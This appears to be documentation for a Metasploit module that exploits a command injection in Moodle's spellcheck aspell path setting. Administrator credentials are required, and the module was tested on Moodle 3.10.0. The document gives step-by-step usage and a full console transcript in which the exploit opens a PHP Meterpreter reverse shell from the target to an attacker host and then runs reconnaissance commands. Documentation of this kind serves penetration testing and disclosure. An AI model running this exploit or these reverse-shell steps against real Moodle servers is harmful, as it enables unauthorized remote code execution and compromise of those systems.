## Vulnerable Application

Moodle allows an authenticated administrator to define spellcheck settings via the web interface.
An administrator can update the aspell path to include a command injection. This is extremely
similar to CVE-2013-3630, just using a different variable.

This module was tested against Moodle version 3.10.0.

### Install

Moodle provides a step by step guide to install their software
[here](https://docs.moodle.org/311/en/Step-by-step_Installation_Guide_for_Ubuntu)

## Verification Steps

1. Install the application
1. Start msfconsole
1. Do: `use exploits/multi/http/moodle_spellcheck_cmd_exec`
1. Do: `set username [username]`
1. Do: `set password [password]`
1. Do: `run`
1. You should get a shell.

## Options

### Passowrd

Password of an administrator.

### Username

Username of an administrator. Defaults to `admin`

## Scenarios

### Moodle 3.10.0 on Ubuntu 20.04

```
resource (moodle_spellcheck.rb)> use exploits/multi/http/moodle_spellcheck_cmd_exec
[*] No payload configured, defaulting to php/meterpreter/reverse_tcp
resource (moodle_spellcheck.rb)> set rhosts 1.1.1.1
rhosts => 1.1.1.1
resource (moodle_spellcheck.rb)> set username admin
username => admin
resource (moodle_spellcheck.rb)> set password Adminadmin1!
password => Adminadmin1!
resource (moodle_spellcheck.rb)> set targeturi /moodle-3.10.0/
targeturi => /moodle-3.10.0/
resource (moodle_spellcheck.rb)> set payload payload/php/meterpreter/reverse_tcp
payload => php/meterpreter/reverse_tcp
resource (moodle_spellcheck.rb)> set lhost eth0
lhost => eth0
resource (moodle_spellcheck.rb)> exploit
[*] Started reverse TCP handler on 2.2.2.2:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[!] The service is running, but could not be validated. Moodle instance found, version unknown
[*] Authenticating as user: admin with login token Em5QrqGXT96iLHXKaTDoIwArMueav9Hq
[*] Updating aspell path
[*] Changing spell engine to PSpellShell
[*] Triggering payload
[*] Sending stage (39282 bytes) to 1.1.1.1
[*] Meterpreter session 1 opened (2.2.2.2:4444 -> 1.1.1.1:56014) at 2021-08-27 17:49:36 -0400
[*] Sleeping 5 seconds before cleanup
[*] Authenticating as user: admin with login token mPj0QEp8KtPDgm8K9PNUauMu7wdwnSFY
[*] Removing RCE from settings

meterpreter > getuid
Server username: www-data (33)
meterpreter > sysinfo
Computer    : moodle
OS          : Linux moodle 5.4.0-81-generic #91-Ubuntu SMP Thu Jul 15 19:09:17 UTC 2021 x86_64
Meterpreter : php/linux
meterpreter > exit
```